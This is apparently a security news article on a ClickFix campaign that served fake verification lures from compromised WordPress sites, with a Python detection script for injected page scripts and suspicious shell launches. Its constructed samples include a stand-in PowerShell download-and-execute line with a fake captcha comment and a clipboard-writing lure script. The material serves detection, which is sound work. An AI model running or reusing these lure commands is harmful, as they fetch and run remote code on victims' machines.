Attackers have compromised more than 250 legitimate websites, many running WordPress, and are using them to deliver ClickFix-style malware lures that can infect visitors with infostealers, according to research highlighted by Rapid7.
The campaign abused trusted sites rather than obvious malicious domains. Infosecurity Magazine reported that the affected pages included news outlets and a U.S. Senate candidate’s official website. Visitors were shown fake verification or troubleshooting prompts designed to trick them into copying and executing malicious commands themselves, a hallmark of ClickFix attacks.
That user-assisted step matters because it can sidestep some automated defenses. There is no browser exploit for a web filter to block and no attachment for a mail gateway or sandbox to detonate; the victim launches the infection chain by pasting a command into a shell, so the first malicious process is spawned from the user's own session rather than from the browser. Rapid7 said the end goal was infostealer malware, which typically targets browser-stored passwords, session cookies, autofill data and cryptocurrency wallet information.
The report does not publicly tie the campaign to a specific CVE or named malware family. That leaves open several possible entry points for the website compromises, including vulnerable plugins or themes, stolen administrator credentials, or weaknesses in hosting environments. What is clear is the scale: hundreds of real websites were turned into malware delivery infrastructure.
The wider risk extends beyond the initial infection. Stolen credentials and session tokens are commonly reused for account takeover, fraud and follow-on intrusions. For site owners, the campaign is another reminder that a compromised CMS can become a distribution point for attacks against readers, customers and supporters. For users, a familiar domain is no guarantee of safety: a legitimate site can serve a malicious prompt, and any prompt asking them to paste commands into PowerShell, a terminal or the Windows Run box should be treated as suspicious.
Defenders should watch for injected JavaScript on web servers (unexpected script tags or obfuscated inline code in theme files, plugins or database-stored content), suspicious command-line execution on endpoints (PowerShell, cmd.exe or mshta.exe launched from explorer.exe with hidden-window, encoded or download-and-execute arguments shortly after browsing activity), and signs of browser credential theft, such as unfamiliar processes reading browser profile databases. Organizations that rely on WordPress should prioritize patching, plugin and theme reviews, multi-factor authentication and least-privilege administrator accounts. Users who suspect exposure should reset passwords and revoke active sessions, since stolen cookies remain valid until they are invalidated; a trusted VPN may help on untrusted networks but does nothing against this kind of social engineering on its own.
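The following triage script, added here as an illustration and not taken from Rapid7's research or any vendor's detection logic, shows the two checks above in working form: it flags injected or lure-style script blocks in a fetched WordPress page, and it scores endpoint process-creation events for the paste-and-run pattern (a shell spawned by explorer.exe, hidden window, download cradle, and the "I am not a robot" style trailing comment ClickFix commands carry so the Run box looks harmless). The sample HTML, the hostnames (`news.example.invalid`, `static.attacker.invalid`, `lure.invalid`) and the two process events are constructed for the example; the weights and the threshold of 4 are assumptions to tune against your own telemetry.

```python
"""ClickFix triage helpers (example code for this article, not a vendor's detector).

1. find_injected_scripts: inspect page HTML for scripts loaded from hosts outside an
   allow-list, or inline scripts that combine obfuscation, clipboard writes and lure text.
2. score_process_event: score a process-creation event for the ClickFix paste-and-run pattern.
All sample inputs below are constructed; weights and threshold are assumptions.
"""
import re
from urllib.parse import urlparse

# ---- 1. Web side: injected scripts in page HTML ---------------------------------
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_RE = re.compile(r"""src\s*=\s*["']([^"']+)["']""", re.I)
LURE_TEXT_RE = re.compile(r"not a robot|verify you are human|press win\s*\+\s*r|ctrl\s*\+\s*v", re.I)
OBFUSCATION_RES = {
    "atob": re.compile(r"\batob\s*\("),
    "fromCharCode": re.compile(r"String\.fromCharCode"),
    "eval": re.compile(r"\beval\s*\("),
    # ClickFix pages copy the command into the clipboard so the victim only has to paste it
    "clipboard_write": re.compile(r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy"),
}


def find_injected_scripts(html, allowed_hosts):
    """Return findings for external scripts off the allow-list and suspicious inline scripts."""
    findings = []
    for attrs, body in SCRIPT_RE.findall(html):
        src = SRC_RE.search(attrs)
        if src:
            host = (urlparse(src.group(1)).hostname or "").lower()
            if host and host not in allowed_hosts:  # relative paths have no host and are skipped
                findings.append({"kind": "external", "detail": src.group(1)})
            continue
        hits = [name for name, rx in OBFUSCATION_RES.items() if rx.search(body)]
        if LURE_TEXT_RE.search(body):
            hits.append("lure_text")
        # A lone clipboard write is normal (copy buttons); require lure text or two signals.
        if "lure_text" in hits or len(hits) >= 2:
            findings.append({"kind": "inline", "detail": hits})
    return findings


# ---- 2. Endpoint side: process-creation events ----------------------------------
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
CMDLINE_SIGNALS = [  # (regex over the lower-cased command line, weight, label); weights assumed
    (r"(^|\s)-(e|ec|enc|encodedcommand)\s+[a-z0-9+/=]{16,}", 2, "encoded_command"),
    (r"\b(iwr|invoke-webrequest|downloadstring|invoke-expression|iex|curl)\b|mshta\s+https?://", 2, "download_cradle"),
    (r"-(w|windowstyle)\s+hidden", 1, "hidden_window"),
    (r"-(nop|noprofile)\b", 1, "no_profile"),
    (r"-(ep|executionpolicy)\s+bypass", 1, "policy_bypass"),
    (r"#\s*['\"]?\s*(i am not a robot|verification|captcha)", 3, "lure_comment"),
]


def score_process_event(event):
    """Return (score, reasons) for a dict with 'parent', 'image' and 'cmdline' keys."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    cmd = event["cmdline"].lower()
    score, reasons = 0, []
    if image in SHELL_IMAGES and parent == "explorer.exe":  # Run box launch, no console parent
        score += 2
        reasons.append("shell_from_explorer")
    for pattern, weight, name in CMDLINE_SIGNALS:
        if re.search(pattern, cmd):
            score += weight
            reasons.append(name)
    return score, reasons


def is_clickfix_like(event, threshold=4):
    return score_process_event(event)[0] >= threshold


# ---- Constructed samples ---------------------------------------------------------
SAMPLE_HTML = """<!doctype html><html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://static.attacker.invalid/verify.js"></script>
</head><body><p>Latest headlines</p>
<script>
var p=atob("UHJlc3MgV2luK1I=");navigator.clipboard.writeText(p);
document.body.innerHTML+='<div>Verify you are human: press Win+R, Ctrl+V, Enter</div>';
</script>
<script>document.getElementById('copy-btn').onclick=function(){navigator.clipboard.writeText('npm install foo');};</script>
</body></html>"""

SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Process"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -nop -c "iex (iwr http://lure.invalid/v.txt -UseBasicParsing)"'
                ' # "I am not a robot - reCAPTCHA Verification ID: 7311"'},
]

if __name__ == "__main__":
    for f in find_injected_scripts(SAMPLE_HTML, {"news.example.invalid"}):
        print("web:", f)
    for ev in SAMPLE_EVENTS:
        print("endpoint:", score_process_event(ev))
```

On the web side, the allow-list should hold the site's own host and the CDNs it legitimately uses; run the check against a cached copy of each page from outside the admin session, since some injections only render for unauthenticated visitors. On the endpoint side, the explorer.exe parent is the strongest single signal for the Run-box variant, but the same command pasted into an already open terminal will have a console parent instead, which is why the command-line signals are scored separately.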